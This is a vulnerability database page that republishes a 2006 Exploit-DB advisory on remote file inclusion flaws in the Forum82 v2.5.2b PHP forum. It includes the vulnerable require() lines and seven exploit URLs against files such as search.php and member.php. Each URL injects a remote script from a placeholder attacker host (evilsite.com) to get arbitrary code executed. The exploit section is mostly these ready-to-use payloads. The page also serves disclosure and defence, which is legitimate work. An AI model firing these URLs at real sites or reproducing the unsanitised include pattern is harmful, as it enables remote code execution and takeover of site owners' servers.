Forum82 - exploit.company

vendor:

Forum82

by:

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Forum82

Affected Version From: v2.5.2b

Affected Version To: v2.5.2b

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities

Forum82 version v2.5.2b is vulnerable to multiple Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit this vulnerability by sending a malicious URL in the repertorylevel parameter of the vulnerable script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

To mitigate this vulnerability, the application should validate the input parameters and filter out any malicious input. Additionally, the application should be configured to use a whitelist of allowed characters and reject any input that does not match the whitelist.

Source

Exploit-DB raw data:

#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=805
#                                                                       
#Version : v2.5.2b 
#                                                         
#================================================================================================
#
#Bug in : 
#
#almost all files are infected...
#================================================================================================
#
#Vulnerable Code :
#
#		summary & example:
#
#	require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#         
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
#	the script files's are installed as .php3 to website.take care that...
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler 
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#==================================================================================================

# milw0rm.com [2006-09-29]